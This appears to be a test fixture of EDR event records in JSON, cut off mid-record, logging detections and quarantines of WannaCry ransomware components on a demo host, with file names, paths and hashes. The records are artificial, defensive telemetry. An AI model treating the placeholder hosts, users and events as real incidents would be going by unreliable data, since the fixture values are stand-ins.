+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":430000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.4A468603FD.04426d77.auto.Talos","detection_id":"6419303574240493597","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"taskdl.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\taskdl.exe","identity":{"sha256":"4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79"},"parent":{"process_id":2920,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":327000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419303574240493595","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"u.wnry","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\u.wnry","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25","sha1":"45356a9dd616ed7161a3b9192e2f318d0ab5ad10","md5":"7bf2b57f2a205768755c07f238fb32cc"},"parent":{"process_id":2920,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":313000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419303574240493594","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"@WanaDecryptor@.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\@WanaDecryptor@.exe","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25","sha1":"45356a9dd616ed7161a3b9192e2f318d0ab5ad10","md5":"7bf2b57f2a205768755c07f238fb32cc"},"parent":{"process_id":2920,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat 
Quarantined","event_type_id":553648143,"detection_id":"6419303574240493595","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419303574240493594","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419303569945526290","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat 
Quarantined","event_type_id":553648143,"detection_id":"6419303569945526289","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419303565650558983","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303569945526000,"timestamp":1610652550,"timestamp_nanoseconds":782000000,"date":"2021-01-14T19:29:10+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558982","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303569945526000,"timestamp":1610652550,"timestamp_nanoseconds":751000000,"date":"2021-01-14T19:29:10+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558980","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete 
pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303569945526000,"timestamp":1610652550,"timestamp_nanoseconds":751000000,"date":"2021-01-14T19:29:10+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558979","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303569945526000,"timestamp":1610652550,"timestamp_nanoseconds":751000000,"date":"2021-01-14T19:29:10+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558978","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303569945526000,"timestamp":1610652550,"timestamp_nanoseconds":580000000,"date":"2021-01-14T19:29:10+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.2CA2D550E6-100.SBX.VIOC","detection_id":"6419303569945526290","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"taskse.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\taskse.exe","identity":{"sha256":"2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d","sha1":"be5d6279874da315e3080b06083757aad9b32c23","md5":"8495400f199ac77853c53b5a3f278f3e"},"parent":{"process_id":2920,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303569945526000,"timestamp":1610652550,"timestamp_nanoseconds":564000000,"date":"2021-01-14T19:29:10+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.4A468603FD.04426d77.auto.Talos","detection_id":"6419303569945526289","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"taskdl.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\taskdl.exe","identity":{"sha256":"4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79","sha1":"47a9ad4125b6bd7c55e4e7da251e23f089407b8f","md5":"4fef5e34143e646dbf9907c4374276f5"},"parent":{"process_id":2920,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303569945526000,"timestamp":1610652550,"timestamp_nanoseconds":782000000,"date":"2021-01-14T19:29:10+00:00","event_type":"Threat 
Quarantined","event_type_id":553648143,"detection_id":"6419303565650558981","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303569945526000,"timestamp":1610652550,"timestamp_nanoseconds":751000000,"date":"2021-01-14T19:29:10+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419303565650558977","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303565650559000,"timestamp":1610652549,"timestamp_nanoseconds":791000000,"date":"2021-01-14T19:29:09+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419303565650558984","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303565650559000,"timestamp":1610652549,"timestamp_nanoseconds":783000000,"date":"2021-01-14T19:29:09+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419303565650558983","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303565650559000,"timestamp":1610652549,"timestamp_nanoseconds":727000000,"date":"2021-01-14T19:29:09+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419303565650558982","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":7144,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303565650559000,"timestamp":1610652549,"timestamp_nanoseconds":721000000,"date":"2021-01-14T19:29:09+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419303565650558981","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\WINDOWS\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":7144,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303565650559000,"timestamp":1610652549,"timestamp_nanoseconds":646000000,"date":"2021-01-14T19:29:09+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419303565650558980","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303565650559000,"timestamp":1610652549,"timestamp_nanoseconds":504000000,"date":"2021-01-14T19:29:09+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419303565650558979","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303565650559000,"timestamp":1610652549,"timestamp_nanoseconds":426000000,"date":"2021-01-14T19:29:09+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.24D004A104-95.SBX.TG","detection_id":"6419303565650558978","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\WINDOWS\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"},"parent":{"process_id":768,"